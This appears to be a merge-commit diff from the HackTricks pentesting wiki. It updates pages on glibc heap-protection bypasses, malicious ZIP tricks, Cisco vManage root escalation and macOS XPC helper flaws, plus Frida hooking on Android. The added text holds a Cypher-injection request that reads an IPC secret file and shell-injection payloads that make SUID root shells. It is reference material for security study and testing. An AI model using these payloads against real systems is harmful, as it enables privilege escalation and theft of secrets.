Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

Author: carlospolop

src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md

@@ -10,10 +10,12 @@
 
 The enforcement of chunk alignment in 64-bit systems significantly enhances Malloc's security by **limiting the placement of fake chunks to only 1 out of every 16 addresses**. This complicates exploitation efforts, especially in scenarios where the user has limited control over input values, making attacks more complex and harder to execute successfully.
 
-- **Fastbin Attack on \_\_malloc_hook**
+- **Fastbin Attack on `__malloc_hook`**
 
 The new alignment rules in Malloc also thwart a classic attack involving the `__malloc_hook`. Previously, attackers could manipulate chunk sizes to **overwrite this function pointer** and gain **code execution**. Now, the strict alignment requirement ensures that such manipulations are no longer viable, closing a common exploitation route and enhancing overall security.
 
+> **Note:** Since glibc **2.34** the legacy hooks (`__malloc_hook`, `__free_hook`, etc.) are removed from the exported ABI. Modern exploits now target other writable function pointers (e.g. tcache per-thread struct, vtable-style callbacks) or rely on `setcontext`, `_IO_list_all` primitives, etc.
+
 ## Pointer Mangling on fastbins and tcache
 
 **Pointer Mangling** is a security enhancement used to protect **fastbin and tcache Fd pointers** in memory management operations. This technique helps prevent certain types of memory exploit tactics, specifically those that do not require leaked memory information or that manipulate memory locations directly relative to known positions (relative **overwrites**).
@@ -40,6 +42,18 @@ Pointer mangling aims to **prevent partial and full pointer overwrites in heap**
 3. **Requirement for Heap Leaks in Non-Heap Locations**: Creating a fake chunk in non-heap areas (like the stack, .bss section, or PLT/GOT) now also **requires a heap leak** due to the need for pointer mangling. This extends the complexity of exploiting these areas, similar to the requirement for manipulating LibC addresses.
 4. **Leaking Heap Addresses Becomes More Challenging**: Pointer mangling restricts the usefulness of Fd pointers in fastbin and tcache bins as sources for heap address leaks. However, pointers in unsorted, small, and large bins remain unmangled, thus still usable for leaking addresses. This shift pushes attackers to explore these bins for exploitable information, though some techniques may still allow for demangling pointers before a leak, albeit with constraints.
 
+### **Safe-Linking Bypass (page-aligned leak scenario)**
+
+Even with safe-linking enabled (glibc ≥ 2.32), if you can leak the mangled pointer and both the corrupted chunk and victim chunk share the same 4KB page, the original pointer can be recovered with just the page offset:
+
+```c
+// leaked_fd is the mangled Fd read from the chunk on the same page
+uintptr_t l = (uintptr_t)&chunk->fd;           // storage location
+uintptr_t original = (leaked_fd ^ (l >> 12));  // demangle
+```
+
+This restores the Fd and permits classic tcache/fastbin poisoning. If the chunks sit on different pages, brute-forcing the 12-bit page offset (0x1000 possibilities) is often feasible when allocation patterns are deterministic or when crashes are acceptable (e.g., CTF-style exploits).
+
 ### **Demangling Pointers with a Heap Leak**
 
 > [!CAUTION]
@@ -76,12 +90,13 @@ Pointer guard is an exploit mitigation technique used in glibc to protect stored
 4. **Alternative Plaintexts:** The attacker can also experiment with mangling pointers with known values like 0 or -1 to see if these produce identifiable patterns in memory, potentially revealing the secret when these patterns are found in memory dumps.
 5. **Practical Application:** After computing the secret, an attacker can manipulate pointers in a controlled manner, essentially bypassing the Pointer Guard protection in a multithreaded application with knowledge of the libc base address and an ability to read arbitrary memory locations.
 
-## References
-
-- [https://maxwelldulin.com/BlogPost?post=5445977088](https://maxwelldulin.com/BlogPost?post=5445977088)
-- [https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1](https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1)
+## GLIBC Tunables & Recent Loader Bugs
 
-{{#include ../../banners/hacktricks-training.md}}
+The dynamic loader parses `GLIBC_TUNABLES` before program startup. Mis-parsing bugs here directly affect **libc** before most mitigations kick in. The 2023 "Looney Tunables" bug (CVE-2023-4911) is an example: an overlong `GLIBC_TUNABLES` value overflows internal buffers in `ld.so`, enabling **privilege escalation** on many distros when combined with SUID binaries. Exploitation requires only crafting the environment and repeatedly invoking the target binary; pointer guard or safe-linking do not prevent it because corruption happens in the loader prior to heap setup.
 
+## References
 
+- [Safe-Linking bypass explanation (shellphish/how2heap)](https://deepwiki.com/shellphish/how2heap/5.2-safe-linking-bypass)
+- [Looney Tunables (CVE-2023-4911) write-up](https://www.wiz.io/vulnerability-database/cve/cve-2023-4911)
 
+{{#include ../../banners/hacktricks-training.md}}

src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md

@@ -64,6 +64,9 @@ Heuristic: If an APK installs and runs on-device but core entries appear "encryp
 
 Fix by clearing GPBF bit 0 in both Local File Headers (LFH) and Central Directory (CD) entries. Minimal byte-patcher:
 
+<details>
+<summary>Minimal GPBF bit-clear patcher</summary>
+
 ```python
 # gpbf_clear.py – clear encryption bit (bit 0) in ZIP local+central headers
 import struct, sys
@@ -95,6 +98,8 @@ if __name__ == '__main__':
     print(f'Patched: LFH={p_lfh}, CDH={p_cdh}')
 ```
 
+</details>
+
 Usage:
 
 ```bash
@@ -171,11 +176,66 @@ Blue-team detection ideas:
 
 ---
 
+## Other malicious ZIP tricks (2024–2025)
+
+### Concatenated central directories (multi-EOCD evasion)
+
+Recent phishing campaigns ship a single blob that is actually **two ZIP files concatenated**. Each has its own End of Central Directory (EOCD) + central directory. Different extractors parse different directories (7zip reads the first, WinRAR the last), letting attackers hide payloads that only some tools show. This also bypasses basic mail gateway AV that inspects only the first directory.
+
+**Triage commands**
+
+```bash
+# Count EOCD signatures
+binwalk -R "PK\x05\x06" suspect.zip
+# Dump central-directory offsets
+zipdetails -v suspect.zip | grep -n "End Central"
+```
+
+If more than one EOCD appears or there is "data after payload" warnings, split the blob and inspect each part:
+
+```bash
+# recover the second archive (heuristic: start at second EOCD offset)
+# adjust OFF based on binwalk output
+OFF=123456
+dd if=suspect.zip bs=1 skip=$OFF of=tail.zip
+7z l tail.zip   # list hidden content
+```
+
+### Quoted-overlap / overlapping-entry bombs (non-recursive)
+
+Modern "better zip bomb" builds a tiny **kernel** (highly compressed DEFLATE block) and reuses it via overlapping local headers. Every central directory entry points to the same compressed data, achieving >28M:1 ratios without nesting archives. Libraries that trust central directory sizes (Python `zipfile`, Java `java.util.zip`, Info-ZIP prior to hardened builds) can be forced to allocate petabytes.
+
+**Quick detection (duplicate LFH offsets)**
+
+```python
+# detect overlapping entries by identical relative offsets
+import struct, sys
+buf=open(sys.argv[1],'rb').read()
+off=0; seen=set()
+while True:
+    i = buf.find(b'PK\x01\x02', off)
+    if i<0: break
+    rel = struct.unpack_from('<I', buf, i+42)[0]
+    if rel in seen:
+        print('OVERLAP at offset', rel)
+        break
+    seen.add(rel); off = i+4
+```
+
+**Handling**
+- Perform a dry-run walk: `zipdetails -v file.zip | grep -n "Rel Off"` and ensure offsets are strictly increasing and unique.
+- Cap accepted total uncompressed size and entry count before extraction (`zipdetails -t` or custom parser).
+- When you must extract, do it inside a cgroup/VM with CPU+disk limits (avoid unbounded inflation crashes).
+
+---
+
 ## References
 
 - [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
 - [GodFather – Part 1 – A multistage dropper (APK ZIP anti-reversing)](https://shindan.io/blog/godfather-part-1-a-multistage-dropper)
 - [zipdetails (Archive::Zip script)](https://metacpan.org/pod/distribution/Archive-Zip/scripts/zipdetails)
 - [ZIP File Format Specification (PKWARE APPNOTE.TXT)](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)
+- [Hackers bury malware in new ZIP file attack — concatenated ZIP central directories](https://www.tomshardware.com/tech-industry/cyber-security/hackers-bury-malware-in-new-zip-file-attack-combining-multiple-zips-into-one-bypasses-antivirus-protections)
+- [Understanding Zip Bombs: overlapping/quoted-overlap kernel construction](https://ubos.tech/news/understanding-zip-bombs-construction-risks-and-mitigation-2/)
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../../banners/hacktricks-training.md}}

src/linux-hardening/privilege-escalation/cisco-vmanage.md

@@ -17,7 +17,7 @@ vmanage:~$ ls -al /etc/confd/confd_ipc_secret
 Remember our Neo4j instance? It is running under the `vmanage` user's privileges, thus allowing us to retrieve the file using the previous vulnerability:
 
 ```
-GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
+GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
 
 Host: vmanage-XXXXXX.viptela.net
 
@@ -56,7 +56,10 @@ The blog¹ by the synacktiv team described an elegant way to get a root shell, b
 
 When I disassembled `/usr/bin/confd_cli` binary, I observed the following:
 
-```
+<details>
+<summary>Objdump showing UID/GID collection</summary>
+
+```asm
 vmanage:~$ objdump -d /usr/bin/confd_cli
 … snipped …
 40165c: 48 89 c3              mov    %rax,%rbx
@@ -85,6 +88,8 @@ vmanage:~$ objdump -d /usr/bin/confd_cli
 … snipped …
 ```
 
+</details>
+
 When I run “ps aux”, I observed the following (_note -g 100 -u 107_)
 
 ```
@@ -124,7 +129,10 @@ run
 
 Console Output:
 
-```
+<details>
+<summary>Console output</summary>
+
+```text
 vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
 GNU gdb (GDB) 8.0.1
 Copyright (C) 2017 Free Software Foundation, Inc.
@@ -158,7 +166,25 @@ uid=0(root) gid=0(root) groups=0(root)
 bash-4.4#
 ```
 
-{{#include ../../banners/hacktricks-training.md}}
+</details>
+
+## Path 3 (2025 CLI input validation bug)
 
+Cisco renamed vManage to *Catalyst SD-WAN Manager*, but the underlying CLI still runs on the same box. A 2025 advisory (CVE-2025-20122) describes insufficient input validation in the CLI that lets **any authenticated local user** gain root by sending a crafted request to the manager CLI service. Combine any low-priv foothold (e.g., the Neo4j deserialization from Path1, or a cron/backup user shell) with this flaw to jump to root without copying `confd_cli_user` or attaching GDB:
 
+1. Use your low-priv shell to locate the CLI IPC endpoint (typically the `cmdptywrapper` listener shown on port 4565 in Path2).
+2. Craft a CLI request that forges UID/GID fields to 0. The validation bug fails to enforce the original caller’s UID, so the wrapper launches a root-backed PTY.
+3. Pipe any command sequence (`vshell; id`) through the forged request to obtain a root shell.
 
+> The exploit surface is local-only; remote code execution is still required to land the initial shell, but once inside the box exploitation is a single IPC message rather than a debugger-based UID patch.
+
+## Other recent vManage/Catalyst SD-WAN Manager vulns to chain
+
+* **Authenticated UI XSS (CVE-2024-20475)** – Inject JavaScript in specific interface fields; stealing an admin session gives you a browser-driven path to `vshell` → local shell → Path3 for root.
+
+## References
+
+- [Cisco Catalyst SD-WAN Manager Privilege Escalation Vulnerability (CVE-2025-20122)](https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-sdwan-priviesc-WCk7bmmt.html)
+- [Cisco Catalyst SD-WAN Manager Cross-Site Scripting Vulnerability (CVE-2024-20475)](https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-sdwan-xss-zQ4KPvYd.html)
+
+{{#include ../../banners/hacktricks-training.md}}

src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md

@@ -288,6 +288,14 @@ authenticate-session-owner, authenticate-session-owner-or-admin, authenticate-se
 
 ### Authorization Bypass Case Studies
 
+- **CVE-2025-65842 – Acustica Audio Aquarius HelperTool**: The privileged Mach service `com.acustica.HelperTool` accepts every connection and its `checkAuthorization:` routine calls `AuthorizationCopyRights(NULL, …)`, so any 32‑byte blob passes. `executeCommand:authorization:withReply:` then feeds attacker-controlled comma‑separated strings into `NSTask` as root, making payloads such as:
+
+```bash
+"/bin/sh,-c,cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash"
+```
+
+trivially create a SUID root shell. Details in [this write-up](https://almightysec.com/helpertool-xpc-service-local-privilege-escalation/).
+- **CVE-2025-55076 – Plugin Alliance InstallationHelper**: The listener always returns YES and the same NULL `AuthorizationCopyRights` pattern appears in `checkAuthorization:`. Method `exchangeAppWithReply:` concatenates attacker input into a `system()` string twice, so injecting shell metacharacters in `appPath` (e.g. `"/Applications/Test.app";chmod 4755 /tmp/rootbash;`) yields root code execution via the Mach service `com.plugin-alliance.pa-installationhelper`. More info [here](https://almightysec.com/Plugin-Alliance-HelperTool-XPC-Service-Local-Privilege-Escalation/).
 - **CVE-2024-4395 – Jamf Compliance Editor helper**: Running an audit drops `/Library/LaunchDaemons/com.jamf.complianceeditor.helper.plist`, exposes the Mach service `com.jamf.complianceeditor.helper`, and exports `-executeScriptAt:arguments:then:` without verifying the caller’s `AuthorizationExternalForm` or code signature. A trivial exploit `AuthorizationCreate`s an empty reference, connects with `[[NSXPCConnection alloc] initWithMachServiceName:options:NSXPCConnectionPrivileged]`, and invokes the method to execute arbitrary binaries as root. Full reversing notes (plus PoC) in [Mykola Grymalyuk’s write-up](https://khronokernel.com/macos/2024/05/01/CVE-2024-4395.html).
 - **CVE-2025-25251 – FortiClient Mac helper**: FortiClient Mac 7.0.0–7.0.14, 7.2.0–7.2.8 and 7.4.0–7.4.2 accepted crafted XPC messages that reached a privileged helper lacking authorization gates. Because the helper trusted its own privileged `AuthorizationRef`, any local user able to message the service could coerce it into executing arbitrary configuration changes or commands as root. Details in [SentinelOne’s advisory summary](https://www.sentinelone.com/vulnerability-database/cve-2025-25251/).
 
@@ -456,6 +464,8 @@ int main(void) {
 - [https://theevilbit.github.io/posts/secure_coding_xpc_part1/](https://theevilbit.github.io/posts/secure_coding_xpc_part1/)
 - [https://khronokernel.com/macos/2024/05/01/CVE-2024-4395.html](https://khronokernel.com/macos/2024/05/01/CVE-2024-4395.html)
 - [https://www.sentinelone.com/vulnerability-database/cve-2025-25251/](https://www.sentinelone.com/vulnerability-database/cve-2025-25251/)
+- [https://almightysec.com/helpertool-xpc-service-local-privilege-escalation/](https://almightysec.com/helpertool-xpc-service-local-privilege-escalation/)
+- [https://almightysec.com/Plugin-Alliance-HelperTool-XPC-Service-Local-Privilege-Escalation/](https://almightysec.com/Plugin-Alliance-HelperTool-XPC-Service-Local-Privilege-Escalation/)
 
 {{#include ../../../../../banners/hacktricks-training.md}}
 

src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md

@@ -127,14 +127,54 @@ Java.perform(function () {
 })
 ```
 
+## Hooking on recent Android versions (14/15/16)
+
+- From **Frida 17.1.x+** Java hooking on Android 14–16 is stable again (ART quick entrypoint offsets were fixed). If `Java.choose` returns nothing on Android 14+, upgrade **frida-server/gadget** and the **CLI/Python** packages to >=17.1.5.
+- Apps with early anti-debug checks often die before `attach`. Use **spawn** so hooks load before `onCreate`:
+
+```bash
+frida -U -f infosecadventures.fridademo -l hook1.js --no-pause
+```
+
+- When multiple overloads exist, select the target explicitly:
+
+```javascript
+var Cls = Java.use("com.example.Class")
+Cls.doThing.overload('java.lang.String', 'int').implementation = function(s, i) {
+  return this.doThing(s, i)
+}
+```
+
+## Stealthier injection with Zygisk Gadget
+
+Some apps detect **ptrace** or `frida-server`. Magisk/Zygisk modules can load **frida-gadget** inside Zygote so no process is ptraced:
+
+1. Install a Zygisk gadget module (e.g., `zygisk-gadget`) and reboot.
+2. Configure the target package and an optional delay to bypass startup checks:
+
+```bash
+adb shell "su -c 'echo infosecadventures.fridademo,5000 > /data/local/tmp/re.zyg.fri/target_packages'"
+```
+
+3. Launch the app and attach to the gadget name:
+
+```bash
+frida -U -n Gadget -l hook3.js
+```
+
+Because the gadget is injected by Zygote, APK integrity checks stay untouched and basic ptrace/Frida string checks usually fail.
+
 ## Important
 
-In this tutorial you have hooked methods using the name of the mathod and _.implementation_. But if there were **more than one method** with the same name, you will need to **specify the method** that you want to hook **indicating the type of the arguments**.
+In this tutorial you have hooked methods using the name of the method and _.implementation_. But if there were **more than one method** with the same name, you will need to **specify the method** that you want to hook **indicating the type of the arguments**.
 
 You can see that in [the next tutorial](frida-tutorial-2.md).
 
 
-{{#include ../../../banners/hacktricks-training.md}}
 
 
+## References
 
+- [Frida News (Android 14–16 fixes & Frida 17.x releases)](https://frida.re/news/)
+- [zygisk-gadget – Zygisk module that loads frida-gadget](https://github.com/hackcatml/zygisk-gadget)
+{{#include ../../../banners/hacktricks-training.md}}